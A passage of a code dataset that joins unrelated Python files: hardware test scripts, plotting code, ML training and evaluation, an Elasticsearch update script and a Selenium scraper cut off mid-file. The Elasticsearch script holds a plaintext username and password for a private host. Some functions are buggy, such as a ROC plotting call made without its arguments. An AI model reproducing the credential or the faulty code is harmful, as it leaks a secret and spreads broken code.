__name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser(description='Testing MMC3 Ethernet Interface %s\\nExample: python test_eth.py -t 1.0 -d 6 --no-bus', formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument('-w', '--deadline', type=float, metavar='', action='store', help='timeout in seconds before application exits')\n parser.add_argument('-i', '--interval', type=float, metavar='', action='store', help='time interval in seconds for the monitor')\n parser.add_argument('-d', '--delay', type=int, metavar='', action='store', help='clock cycles between TCP writes')\n parser.add_argument('--no-bus', dest='no_bus', action='store_true', help='disable BUS tests')\n parser.add_argument('--no-tcp', dest='no_tcp', action='store_true', help='disable TCP downstream tests')\n parser.set_defaults(no_m26_jtag_configuration=False)\n args = parser.parse_args()\n\n config = {}\n\n if args.deadline is not None:\n config[\"deadline\"] = args.deadline\n if args.interval is not None:\n config[\"monitor_interval\"] = args.interval\n if args.delay is not None:\n config[\"tcp_write_delay\"] = args.delay\n if args.no_bus:\n config[\"test_bus\"] = False\n if args.no_tcp:\n config[\"test_tcp\"] = False\n\n test = Test()\n test.start(**config)\n","repo_name":"SiLab-Bonn/basil","sub_path":"examples/test_eth/test_eth.py","file_name":"test_eth.py","file_ext":"py","file_size_in_byte":15195,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"52"} +{"seq_id":"27615336757","text":"import pickle\nfrom datetime import datetime\nfrom typing import List\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as mtrans\nimport numpy as np\nfrom matplotlib.lines import Line2D\nfrom matplotlib.patches import Rectangle\n\nfrom guidance.recurring_pattern import Pattern\nfrom model.mouse_event_record import MouseEventType\nfrom model.state import State, Severity, Action, Session\n\n\ndef myplot(x, y, bins):\n heatmap, xedges, yedges = np.histogram2d(x, y, bins=bins)\n return heatmap.T\n\n\ndef bounding_box(matrix, x_scale, y_scale):\n rows = np.any(matrix, axis=1)\n cols = np.any(matrix, axis=0)\n x_min, x_max = np.where(cols)[0][[0, -1]]\n y_min, y_max = np.where(rows)[0][[0, -1]]\n x_min = x_min * x_scale\n x_max = x_max * x_scale\n y_min = y_min * y_scale\n y_max = y_max * y_scale\n return (x_min, y_min), x_max - x_min, y_max - y_min\n\n\ndef pattern_class_to_string(pattern_class: int):\n if pattern_class == 0:\n return 'Overview of label classes'\n elif pattern_class == 1:\n return 'Variants of normal curves'\n elif pattern_class == 2:\n return 'Variants of warning curves'\n elif pattern_class == 3:\n return 'Variants of error curves'\n\n\ndef colorForSeverity(severity: Severity):\n if severity == Severity.okay:\n return 'tab:green'\n if severity == Severity.warning:\n return 'tab:orange'\n return 'tab:red'\n\n\ndef visualize_state_list(states: List[State], actions: List[Action], pattern_class: int, i):\n num_rows = len(states)\n num_cols = max([len(state.charts) for state in states])\n\n fig, axes = plt.subplots(nrows=num_rows, ncols=num_cols, figsize=(num_cols * 6, num_rows * 4), dpi=400)\n fig.suptitle(pattern_class_to_string(pattern_class), fontsize=24)\n axes_to_remove = []\n legend_lines = []\n legend_names = []\n legend_names.append('voltage')\n legend_lines.append(Line2D([0], [0], color='tab:cyan', lw=4))\n legend_names.append('current')\n legend_lines.append(Line2D([0], [0], color='tab:olive', lw=4))\n for row in range(num_rows):\n state = states[row]\n num_charts = len(state.charts)\n for column in range(num_cols):\n if column < num_charts:\n chart = state.charts[column]\n if len(chart.data) == 0:\n continue\n # x = np.arange(0, len(chart.data[0]), 1)\n if num_cols == 1:\n ax = axes[row]\n else:\n ax = axes[row, column]\n if column == 0:\n ax.set_ylabel(f'State: {row + 1}\\nAction: {actions[row].type} {actions[row].parameters}')\n ax2 = ax.twinx()\n ax2.get_xaxis().set_major_formatter(\n matplotlib.ticker.FuncFormatter(lambda x, p: f\"{datetime.fromtimestamp(x).second}.{int(datetime.fromtimestamp(x).microsecond / 1000)}\")\n )\n y_dim = 60\n x_values = []\n for idx, chart_data in enumerate(chart.data):\n data = list(zip(*chart_data))\n x_values = [float(date) for date in data[0]]\n y_values = list(data[1])\n if idx == 0:\n ax.plot(x_values, y_values, 'tab:cyan', linewidth=1)\n else:\n ax2.plot(x_values, y_values, 'tab:olive', linewidth=1)\n for label in chart.labels:\n labels_xs = []\n for idx, date in enumerate(x_values):\n if label.start <= date <= label.end:\n labels_xs.append(date)\n if not labels_xs:\n continue\n ax.fill_between(labels_xs, 0, 1, color=colorForSeverity(label.label_class.severity), alpha=0.2, transform=ax.get_xaxis_transform())\n if label.label_class.name not in legend_names:\n legend_names.append(label.label_class.name)\n legend_lines.append(Line2D([0], [0], color=colorForSeverity(label.label_class.severity), alpha=0.5, lw=4))\n xs = [x_values[0], x_values[-1]]\n ys = [0.0, 60.0]\n for event in chart.events:\n if event.type is MouseEventType.mousemove or event.type is MouseEventType.mouseover:\n xs.append(event.x * (x_values[-1] - x_values[0]) + x_values[0])\n ys.append(y_dim * event.y)\n bins = 50\n H = myplot(xs, ys, bins)\n H_masked = np.ma.masked_array(H, H < 3)\n if H_masked.any():\n x_scale = (x_values[-1] - x_values[0]) / bins\n y_scale = 60.0 / bins\n origin, width, height = bounding_box(H_masked, x_scale, y_scale)\n adj_origin = (origin[0] + x_values[0], origin[1])\n # Create a Rectangle patch\n rect = Rectangle(adj_origin, width, height, linewidth=1, edgecolor='b', facecolor='none', zorder=2)\n # Add the patch to the Axes\n ax.add_patch(rect)\n else:\n axes_to_remove.append(axes[row, column])\n\n # Get the bounding boxes of the axes including text decorations\n r = fig.canvas.get_renderer()\n get_bbox = lambda ax: ax.get_tightbbox(r).transformed(fig.transFigure.inverted())\n bboxes = np.array(list(map(get_bbox, axes.flat)), mtrans.Bbox).reshape(axes.shape)\n\n # Get the minimum and maximum extent, get the coordinate half-way between those\n if num_cols == 1:\n ymax = np.array(list(map(lambda b: b.y1, bboxes.flat))).reshape(axes.shape)\n ymin = np.array(list(map(lambda b: b.y0, bboxes.flat))).reshape(axes.shape)\n else:\n ymax = np.array(list(map(lambda b: b.y1, bboxes.flat))).reshape(axes.shape).max(axis=1)\n ymin = np.array(list(map(lambda b: b.y0, bboxes.flat))).reshape(axes.shape).min(axis=1)\n ys = np.c_[ymax[1:], ymin[:-1]].mean(axis=1)\n # Draw a horizontal lines at those coordinates\n for y in ys:\n line = plt.Line2D([0, 1], [y, y], transform=fig.transFigure, color=\"lightgray\")\n fig.add_artist(line)\n\n for axe in axes_to_remove:\n axe.remove()\n\n plt.figlegend(legend_lines, legend_names, loc=(0.8, 0.8))\n plt.savefig(f'fig{i}.png')\n plt.show()\n\n\ndef visualize_eda_session(adapted_patterns: List[Session], patterns: List[Pattern]):\n i = 7\n for adapted_pattern, pattern in zip(adapted_patterns, patterns):\n visualize_state_list(adapted_pattern.states, adapted_pattern.actions, pattern.pattern_class, i)\n i += 1\n\n\nif __name__ == '__main__':\n with open(\"../data/metalarcwelding/interaction/adapted_patterns.pkl\", \"rb\") as f:\n adapted_patterns: List[List[State]] = pickle.load(f)\n\n with open(\"../data/metalarcwelding/interaction/classified_patterns.pkl\", \"rb\") as f:\n patterns: List[Pattern] = pickle.load(f)\n\n visualize_eda_session(adapted_patterns, patterns)\n","repo_name":"tmdt-buw/gideon-core","sub_path":"visualization/maw_visualization.py","file_name":"maw_visualization.py","file_ext":"py","file_size_in_byte":7091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34190581772","text":"import copy\nimport torch\nimport sys\nimport logging\nfrom tqdm import tqdm\nsys.path.append(\"..\")\nfrom helpers.utils import *\nfrom helpers.metrics import *\nfrom baselines.basemethod import BaseSurrogateMethod\n\n\neps_cst = 1e-8\n\n\n\nclass RealizableSurrogate(BaseSurrogateMethod):\n def surrogate_loss_function(self, outputs, hum_preds, data_y):\n \"\"\" Implementation of our RealizableSurrogate loss function\n \"\"\"\n human_correct = (hum_preds == data_y).float()\n human_correct = torch.tensor(human_correct).to(self.device)\n batch_size = outputs.size()[0] # batch_size\n outputs_exp = torch.exp(outputs)\n new_loss = -torch.log2(\n (\n human_correct * outputs_exp[range(batch_size), -1]\n + outputs_exp[range(batch_size), data_y]\n )\n / (torch.sum(outputs_exp, dim=1) + eps_cst)\n ) # pick the values corresponding to the labels\n ce_loss = -torch.log2(\n (outputs_exp[range(batch_size), data_y])\n / (torch.sum(outputs_exp[range(batch_size), :-1], dim=1) + eps_cst)\n )\n loss = self.alpha * new_loss + (1 - self.alpha) * ce_loss\n return torch.sum(loss) / batch_size\n\n # fit with hyperparameter tuning over alpha\n def fit_hyperparam(\n self,\n dataloader_train,\n dataloader_val,\n dataloader_test,\n epochs,\n optimizer,\n lr,\n verbose=True,\n test_interval=5,\n scheduler=None,\n alpha_grid=[0, 0.1, 0.3, 0.5, 0.9, 1],\n ):\n # np.linspace(0,1,11)\n best_alpha = 0\n best_acc = 0\n model_dict = copy.deepcopy(self.model.state_dict())\n for alpha in tqdm(alpha_grid):\n self.alpha = alpha\n self.model.load_state_dict(model_dict)\n self.fit(\n dataloader_train,\n dataloader_val,\n dataloader_test,\n epochs = epochs,\n optimizer = optimizer,\n lr = lr,\n verbose = verbose,\n test_interval = test_interval,\n scheduler = scheduler,\n )[\"system_acc\"]\n accuracy = compute_deferral_metrics(self.test(dataloader_val))[\"system_acc\"]\n logging.info(f\"alpha: {alpha}, accuracy: {accuracy}\")\n if accuracy > best_acc:\n best_acc = accuracy\n best_alpha = alpha\n self.alpha = best_alpha\n self.model.load_state_dict(model_dict)\n fit = self.fit(\n dataloader_train,\n dataloader_val,\n dataloader_test,\n epochs = epochs,\n optimizer = optimizer,\n lr = lr,\n verbose = verbose,\n test_interval = test_interval,\n scheduler = scheduler,\n )\n test_metrics = compute_deferral_metrics(self.test(dataloader_test))\n return test_metrics\n","repo_name":"clinicalml/human_ai_deferral","sub_path":"methods/realizable_surrogate.py","file_name":"realizable_surrogate.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"52"} +{"seq_id":"12828804965","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 12 21:23:30 2019\n\n@author: Ryan\n\"\"\"\n\nimport pandas as pd\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing as pp\n\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\n#from xgboost import XGBClassifier\n#from xgboost import plot_importance\nfrom matplotlib import pyplot\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\nbill_data = pd.read_csv(\"prepared_data.csv\")\n#Remove the row number\nbill_data = bill_data.drop([\"Unnamed: 0\"], axis=1)\n\n# Label Encode!!\nle = pp.LabelEncoder()\nbill_data['Made_Law'] = le.fit_transform(bill_data['Made_Law'])\nbill_data['Revised_SoP'] = le.fit_transform(bill_data['Revised_SoP'])\nbill_data['Amended'] = le.fit_transform(bill_data['Amended'])\nbill_data['Started_House_Or_Senate'] = le.fit_transform(bill_data['Started_House_Or_Senate'])\nbill_data['Summary_Length'] = le.fit_transform(bill_data['Summary_Length'])\n#bill_data['cost'] = le.fit_transform(bill_data['cost'])\nbill_data['No_Cost'] = le.fit_transform(bill_data['No_Cost'])\n\n#print(bill_data)\n\n\n# Convert to target and data sets\ntargets = bill_data.Made_Law.values\ndata = bill_data.drop([\"Made_Law\"], axis=1).values\n\ndata_train, data_test, target_train, target_test_expected = train_test_split(data, targets, test_size=.20)\n\n\ndef getAccuracy(expected, actual):\n numberThatAreCorrect = 0\n for i in range(len(expected)):\n if expected[i] == actual[i]:\n numberThatAreCorrect = numberThatAreCorrect + 1\n \n return round((numberThatAreCorrect / len(expected)) * 100, 2)\n\ndef runMachineLearningAlgorithm(classifierArray, expected, training_data, training_targets, testing_data):\n for classifier in classifierArray:\n classifier.fit(training_data, training_targets)\n target_test_actual = classifier.predict(testing_data)\n print(\"{}: {}%\".format(type(classifier), getAccuracy(expected, target_test_actual)))\n return\n\n\nclassifiers = []\nclassifiers =[GaussianNB(), KNeighborsClassifier(), GradientBoostingClassifier(), MLPClassifier(), MLPClassifier(hidden_layer_sizes= [3, 2]), DecisionTreeClassifier()]\n\nrunMachineLearningAlgorithm(classifiers, target_test_expected, data_train, target_train, data_test)\n\n\n\n\n#xgBoostClassifier = XGBClassifier()\n#xgBoostClassifier.fit(data_train, target_train)\n#plot_importance(xgBoostClassifier)\n#pyplot.show()\n\n","repo_name":"gewondjan/idaho-law-machine-learn","sub_path":"gradient-boosted-machine.py","file_name":"gradient-boosted-machine.py","file_ext":"py","file_size_in_byte":2511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33974432285","text":"from __future__ import print_function\n\nimport numpy as np\n\nfrom explauto.utils.config import make_configuration\n\nfrom dataset import BufferedDataset\n \nfrom interest_model import MiscRandomInterest\n\n\nclass LearningModule(object):\n def __init__(self, mid, m_space, s_space, max_steps, env_conf,\n explo_noise=0.05, motor_babbling_n_iter=10,\n optim_explo=None, end_point=False):\n\n \n self.mid = mid\n self.m_space = m_space\n self.s_space = s_space\n self.n_mdims = len(self.m_space)\n self.n_sdims = len(self.s_space)\n self.max_steps = max_steps\n self.env_conf = env_conf\n self.explo_noise = explo_noise\n self.motor_babbling_n_iter = motor_babbling_n_iter\n self.optim_explo = optim_explo\n self.end_point = end_point\n \n self.s = None\n self.sg = None\n self.last_interest = 0\n self.t = 0\n \n \n # Sensorimotor Model\n conf = make_configuration(list(env_conf.m_mins[m_space]) * self.max_steps,\n list(env_conf.m_maxs[m_space]) * self.max_steps,\n list(np.array(list(env_conf.m_mins[m_space]) + list(env_conf.s_mins))[s_space]) * self.max_steps,\n list(np.array(list(env_conf.m_maxs[m_space]) + list(env_conf.s_maxs))[s_space]) * self.max_steps)\n \n self.sm = BufferedDataset(conf.m_ndims, \n conf.s_ndims,\n buffer_size=10000, # Size of a small kdtree buffer to update this one often and move the data to the big kdtree less often \n lateness=100) # The model can be \"late\" by this number of points: they are not yet taken into account (added to the small kdtree)\n \n\n if self.end_point:\n self.sm_end = BufferedDataset(conf.m_ndims, \n len(s_space),\n buffer_size=10000,\n lateness=100)\n \n self.interest_model = MiscRandomInterest(conf, \n conf.s_dims[-self.n_sdims:], \n self.n_sdims, \n win_size=200)\n else:\n self.interest_model = MiscRandomInterest(conf, \n conf.s_dims, \n self.n_sdims, \n win_size=200)\n \n \n \n def motor_babbling(self, steps=None):\n return np.random.random(self.n_mdims * self.max_steps) * 2. - 1.\n \n def inverse(self, sg, explore=True, log=False):\n # Get nearest neighbor\n if len(self.sm):\n if self.end_point:\n _, idx = self.sm_end.nn_y(sg[-len(self.s_space):])\n m = np.array(self.sm_end.get_x(idx[0]))\n snn = self.sm.get_y(idx[0])\n else:\n _, idx = self.sm.nn_y(sg)\n m = np.array(self.sm.get_x(idx[0]))\n snn = self.sm.get_y(idx[0])\n else:\n return self.motor_babbling()\n # Add Exploration Noise\n if explore:\n if self.optim_explo == \"gaussian\" or self.optim_explo == \"random\":\n # Detect Movement\n snn_steps = len(snn) // self.n_sdims\n move_step = snn_steps\n for i in range(1, snn_steps):\n if abs(snn[self.n_sdims * i] - snn[self.n_sdims * (i-1)]) > 0.01:\n #Move at step i\n move_step = i\n break\n # Explore after Movement detection\n if move_step == 1 or move_step == snn_steps:\n start_explo = 0\n else:\n start_explo = move_step\n \n if self.optim_explo == \"gaussian\":\n explo_vect = [0.] * start_explo * self.n_mdims + [self.explo_noise]*(snn_steps-start_explo) * self.n_mdims\n m = np.random.normal(m, explo_vect).clip(-1.,1.)\n else:\n rdm = 2. * np.random.random(self.max_steps * self.n_mdims) - 1.\n m[start_explo * self.n_mdims:] = rdm[start_explo * self.n_mdims:]\n \n elif self.optim_explo == \"full\":\n explo_vect = [self.explo_noise]*len(m)\n m = np.random.normal(m, explo_vect).clip(-1.,1.)\n else:\n raise NotImplementedError\n return m\n \n def produce(self):\n if self.t < self.motor_babbling_n_iter:\n self.m = self.motor_babbling()\n self.sg = None\n else:\n self.sg = self.interest_model.sample()\n self.m = self.inverse(self.sg)\n return self.m \n \n def update_sm(self, m, s):\n if s[1] != s[-1]:\n self.sm.add_xy(m, s)\n if self.end_point:\n self.sm_end.add_xy(m, s[-len(self.s_space):])\n self.t += 1 \n \n def update_im(self, m, s):\n if self.t > self.motor_babbling_n_iter:\n if self.end_point:\n return self.interest_model.update(self.sg[-len(self.s_space):], s[-len(self.s_space):])\n else:\n return self.interest_model.update(self.sg, s)\n \n def interest(self): return self.interest_model.current_interest\n\n def perceive(self, m, s):\n self.update_sm(m, s)\n\n def get_m(self, ms): return ms[self.m_space]\n def get_s(self, ms): return ms[self.s_space]\n ","repo_name":"sebastien-forestier/IMGEP","sub_path":"2DSimulation/learning_module.py","file_name":"learning_module.py","file_ext":"py","file_size_in_byte":5808,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"42958790190","text":"# %% Trained Model evaluation functions\n\nimport os, sys\nimport numpy as np\nimport pandas as pd\nimport joblib\nfrom sklearn.metrics import mean_squared_error, classification_report, precision_recall_curve, roc_curve\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.model_selection import cross_val_score, cross_val_predict\n\nimport config\nfrom dataset.dataset_loader import get_train_and_test_X_y\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import make_scorer\nimport matplotlib.pyplot as plt\n\n\n# %%\ndef get_rmse(clf, X_test, y_test):\n predictions = clf.predict(X_test)\n mse = mean_squared_error(y_test, predictions)\n return np.sqrt(mse)\n\n\ndef get_multiple_rmse(models, X, y, sample_sizes):\n \"\"\"Calculates rmse for multiple samples sizes and for multiple models.\n models: a dictionary with pairs model_name(string): model (sklearn estimator)\n sample_sizes: list of integers\n returns: pandas dataframe with all the rmses. Rows are sizes, columns are models\"\"\"\n data = {clf_name.title(): [get_rmse(clf, X.sample(size), y.sample(size)) for size in sample_sizes]\n for clf_name, clf in models.items()}\n df_rmse = pd.DataFrame(data, index=sample_sizes)\n df_rmse.name = \"Root mean squared error\"\n df_rmse.index.name = \"num samples\"\n return df_rmse\n\n\ndef print_cross_val_scores(clf, X, y, scoring, cv=5):\n scores = cross_val_score(clf, X, y, scoring=scoring, cv=cv)\n print(\"Scores: \", scores)\n print(\"Mean: \", scores.mean())\n print(\"Standard deviation: \", scores.std())\n\n\ndef get_multiple_cross_val_scores(models, X, y, score, cv=5):\n \"\"\"Calculates a cross validation score for multiple classifier models.\n models: a dictionary with pairs model_name(string): model (sklearn estimator)\n scoring: 'accuracy', 'precision', 'roc_auc'... Takes only one value of those\n (https://scikit-learn.org/stable/modules/model_evaluation.html#scoring-parameter)\n returns: pandas dataframe with all the rmses. Rows are sizes, columns are models\n\n Note: High score values are better than low values\"\"\"\n data = {model_name: [cross_val_score(model, X, y, scoring=score, cv=cv).mean()] for model_name, model in\n models.items()}\n return pd.DataFrame(data, index=['mean'])\n\n\ndef tp(y_true, y_pred):\n return confusion_matrix(y_true, y_pred)[1, 1]\n\n\ndef save_fig(figures_dir, figure_id, tight_layout=True, ):\n path = os.path.join(figures_dir, figure_id + \".png\")\n print(\"Saving figure\", figure_id)\n if tight_layout:\n plt.tight_layout()\n plt.savefig(path, format='png', dpi=300)\n\n\ndef plot_precision_recall_vs_threshold(precisions, recalls, thresholds):\n plt.plot(thresholds, precisions[:-1], \"b--\", label=\"Precision\", linewidth=2)\n plt.plot(thresholds, recalls[:-1], \"g-\", label=\"Recall\", linewidth=2)\n plt.xlabel(\"Threshold\", fontsize=16)\n plt.legend(loc=\"upper left\", fontsize=16)\n plt.ylim([0, 1])\n\n\ndef plot_precision_vs_recall(precisions, recalls):\n plt.plot(recalls, precisions, \"b-\", linewidth=2)\n plt.xlabel(\"Recall\", fontsize=16)\n plt.ylabel(\"Precision\", fontsize=16)\n plt.axis([0, 1, 0, 1])\n\ndef plot_roc_curve(y_train, y_scores):\n fpr, tpr, thresholds = roc_curve(y_train, y_scores[model_name])\n plt.figure()\n lw = 2\n plt.plot(fpr, tpr, color='darkorange', lw=lw, label='ROC curve (area = %0.2f)' % roc_auc_score(y_train, y_scores))\n plt.plot([0, 1], [0, 1], color='navy', lw=lw, linestyle='--')\n plt.xlim([0.0, 1.0])\n plt.ylim([0.0, 1.05])\n plt.xlabel('False Positive Rate')\n plt.ylabel('True Positive Rate')\n plt.title('Receiver operating characteristic')\n plt.legend(loc=\"lower right\")\n save_fig(figures_path, model_name.replace(\" \", \"_\") + \"roc_curve_plot\")\n plt.show()\n\n\n# %% Set script configuration\nprint(f\"Working directory: {os.getcwd()}\")\npath_to_root = \"../\"\nif os.getcwd().endswith(\"InteractionsClassification\"):\n os.chdir(os.getcwd() + \"\\\\src\")\nsearch_path = os.getcwd().replace(f\"\\classification\", \"\")\nif search_path not in sys.path:\n sys.path.append(search_path)\nfor path in sys.path:\n print(path)\nfigures_path = path_to_root + \"figures/\"\nprint(\"Figures saved to: \", figures_path)\nmodels_path = path_to_root + \"models/tuned/\"\n\n# %% Read the dataset and split train and test\nX_train, X_test, y_train, y_test = get_train_and_test_X_y(path_to_root)\n\n# %% Read models\nselected_names = [\n \"stochastic gradient descent classifier\",\n \"random forest classifier\",\n # \"k nearest neighbors classifier\",\n # \"radius neighbors classifier\",\n \"gaussian naive bayes\",\n \"never functional\",\n # \"support vector classifier\"\n]\nmodels = {model_name: joblib.load(models_path + model_name.replace(\" \", \"_\") + \".pkl\") for model_name in selected_names}\n\n# %% Calculate prediction scores\ny_scores = {}\nfor model_name, model in models.items():\n if model_name == \"stochastic gradient descent classifier\":\n y_scores[model_name] = model.decision_function(X_train)\n else:\n y_scores[model_name] = model.predict_proba(X_train)\n\n# %% Basic evaluation: Root mean squared error\nsample_sizes = [5, 100, 1000, 10000]\ndf_rmse = get_multiple_rmse(models, pd.DataFrame(X_train), pd.DataFrame(y_train), sample_sizes)\ndf_rmse\n\n# %% ## Show confussion matrix\nfor model_name, model in models.items():\n print(f\"\\n{model_name.title()}:\")\n y_pred = cross_val_predict(model, X_train, y_train, cv=config.cv)\n print(confusion_matrix(y_train, y_pred))\n\n# %% Cross-Validation: Accuracy\nprint(f\"Cross-validation for 'accuracy':\")\nget_multiple_cross_val_scores(models, X_train, y_train, 'accuracy', config.cv)\n\n# %% Cross-Validation: Precision\nprint(f\"Cross-validation for 'precision':\")\nget_multiple_cross_val_scores(models, X_train, y_train, 'precision')\n\n# %% Cross-Validation: True positives\nprint(f\"Cross-validation for 'true positive':\")\nget_multiple_cross_val_scores(models, X_train, y_train, make_scorer(tp))\n\n# %%\nfor model_name, model in models.items():\n print(f\"\\n{model_name.title()}:\")\n y_pred = model.predict(X_train)\n # Print the precision, recall and f1-score for micro, macro and weighted avg for each class\n print(classification_report(y_train, y_pred, target_names=['non-functional', 'functional']))\n\n\n# %% Show precision-recall vs threshold curve and precision vs recall curve\nfor model_name, model in models.items():\n print(f\"\\n{model_name.title()}:\")\n precisions, recalls, thresholds = precision_recall_curve(y_train, y_scores[model_name])\n\n # Precision recall vs threshold curve\n plt.figure(figsize=(8, 4))\n plot_precision_recall_vs_threshold(precisions, recalls, thresholds)\n plt.xlim([-550, 550])\n save_fig(figures_path, model_name.replace(\" \", \"_\") + \"_precision_recall_vs_threshold_plot\")\n plt.show()\n\n # Precision vs recall curve\n plt.figure(figsize=(8, 4))\n plot_precision_vs_recall(precisions, recalls)\n save_fig(figures_path, model_name.replace(\" \", \"_\") + \"_precision_vs_recall_plot\")\n plt.show()\n\n# %% Show ROC curve\nfrom sklearn.metrics import roc_curve, auc\nfrom sklearn.metrics import roc_auc_score\n\nfor model_name, model in models.items():\n plot_roc_curve()\n\n# %% Show ROC AUC scores\nprint(\"-- ROC AUC scores\")\nfor model_name, model in models.items():\n print(f\"\\n{model_name.title()}: {roc_auc_score(y_train, y_scores[model_name])}\")\n","repo_name":"LuisFranciscoHS/InteractionsClassification","sub_path":"src/Python/classification/model_evaluation.py","file_name":"model_evaluation.py","file_ext":"py","file_size_in_byte":7357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73888218404","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Dec 11 11:59:55 2018\n\n@author: fangyucheng\n\"\"\"\n\nimport json\nimport time\nimport elasticsearch\nimport elasticsearch.helpers\n\nhosts = '192.168.17.11'\nport = 80\nuser_id = 'fangyucheng'\npassword = 'VK0FkWf1fV8f'\nhttp_auth = (user_id, password)\n\nes = elasticsearch.Elasticsearch(hosts=hosts, port=port, http_auth=http_auth)\n\ntask_list = []\nresult_list = []\n\nes_scan = elasticsearch.helpers.scan(es, index='target_releasers')\n\nfor line in es_scan:\n task_list.append(line)\nprint('the length of releaser is %s' % len(task_list))\n\nbulk_all_body = ''\ncount = 0\nfor line in task_list:\n releaser_info = line['_source']\n platform = releaser_info['platform']\n releaser = releaser_info['releaser']\n search_body = {\"query\":{\"bool\":{\"filter\":[{\"term\":{\"platform.keyword\":platform}},\n {\"term\":{\"releaser.keyword\":releaser}},\n {\"term\":{\"data_month\":11}},\n {\"term\":{\"data_year\":2018}},\n {\"term\":{\"stats_type.keyword\":\"new_released\"}}]}}}\n\n es_search = es.search(index='releaser', doc_type='releasers',\n body=search_body)\n if es_search['hits']['total'] != 0:\n hits = es_search['hits']['hits'][0]['_source']['video_num']\n releaser_info['Nov_2018'] = int(hits)\n print(\"releaser %s hit %s video in es\" % (releaser, hits))\n else:\n releaser_info['Nov_2018'] = 0\n task_list.remove(line)\n total = releaser_info['Nov_2018']\n if total >= 900:\n releaser_info['frequency'] = 9\n print(\"%s frequency is 3\" % releaser_info['releaser'])\n if total >= 300:\n releaser_info['frequency'] = 3\n print(\"%s frequency is 3\" % releaser_info['releaser'])\n count += 1\n else:\n releaser_info['frequency'] = 1\n _id = platform + '_' + releaser\n bulk_head = '{\"index\": {\"_id\":\"%s\"}}' % _id\n releaser_info['timestamp'] = int(time.time() * 1e3)\n data_str = json.dumps(releaser_info, ensure_ascii=False)\n bulk_one_body = bulk_head+'\\n'+data_str+'\\n'\n bulk_all_body += bulk_one_body\n es.bulk(index='target_releasers', doc_type='doc',\n body=bulk_all_body)\n bulk_all_body = ''\n print('write %s into es' % releaser)\n","repo_name":"litaolemo/crawler","sub_path":"crawler_sys/tools/count_releaser_publish_num_and_refresh_crawler_frequency.py","file_name":"count_releaser_publish_num_and_refresh_crawler_frequency.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"1550207852","text":"print('start')\nprint('start one({1}), end({0})'.format('cpy', 'cry'))\n\nnumbers = 1, 2, 3, 4\nL = []\n\n# 逆向遍历\nfor i in range(len(numbers)-1, -1, -1):\n print(numbers[i], end=' ')\n\nprint('\\n', '-'*10)\n\nfor i, v in enumerate(numbers):\n print(i, v)\n\n\ndef composeNumber(numbers):\n for i, v in enumerate(numbers):\n print(f'One for nest index = {i}, value = {v}')\n for j in range(i+1, len(numbers)):\n print(f'tow for nest index = {j}, value = {numbers[j]}')\n for k in range(j+1, len(numbers)):\n print(f'three for nest index = {k}, value = {numbers[k]}')\n print(f'compose i = {i}, j = {j}, k = {k}, lastValue = ' +\n str(v) + str(numbers[j]) + str(numbers[k]))\n L.append(str(v) + str(numbers[j]) + str(numbers[k]))\n L.append(str(v) + str(numbers[k]) + str(numbers[j]))\n L.append(str(numbers[k]) + str(v) + str(numbers[j]))\n L.append(str(numbers[k]) + str(numbers[j]) + str(v))\n L.append(str(numbers[j]) + str(numbers[k]) + str(v))\n L.append(str(numbers[j]) + str(v) + str(numbers[k]))\n\n\ncomposeNumber(numbers)\n\nfor i, v in enumerate(L):\n print(f'==== {v}')\n\n\nprices = [1, 2, 4, 5]\npt = [[0 for _ in range(2)] for i in prices]\npt2 = [[0] for _ in range(2) for i in prices]\npt3 = [[[0 for _ in range(2)] for _ in range(2)] for i in prices]\nprint(pt)\nprint(pt2)\nprint(pt3)\n\n\nword1 = 'workd1'\nfor i in word1[:3]:\n print(i)\n\nfor i in range(1, 3):\n print(i)\n","repo_name":"PykeChen/pythonBasicGramer","sub_path":"For.py","file_name":"For.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"30299257536","text":"# -*- coding:utf-8 -*-\nfrom bs4 import BeautifulSoup\nimport urllib.request\nimport urllib.parse\nimport urllib.error\nimport urllib\nimport http.cookiejar\nimport re\nimport sys\nimport string\nimport threading\nimport queue\nimport os\nimport re\nimport pickle\nimport time\nimport json\nfrom pymysql import *\nfrom pymongo import *\nfrom bson.objectid import ObjectId\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.support.wait import WebDriverWait\n\n\ndef get_page(url, browser):\n browser.get(url)\n rules = re.compile(r'.*/list/.*')\n # 向下拖动至底端\n if rules.match(str(browser.current_url)):\n js = \"var q=document.documentElement.scrollTop=10000\"\n browser.execute_script(js)\n time.sleep(0.2)\n browser.execute_script(js)\n time.sleep(0.2)\n time.sleep(0.5)\n content = browser.page_source\n return content\n\n\ndef rollpage(browser):\n try:\n next_btn = browser.find_element_by_xpath('//div[@class=\"icon icon-page-next\"]')\n except:\n next_btn = None # 到了最后一页\n\n if next_btn is not None:\n next_btn.click()\n time.sleep(0.4)\n return True\n else:\n return False\n\n\ndef get_searchpage_links(page, content):\n links = 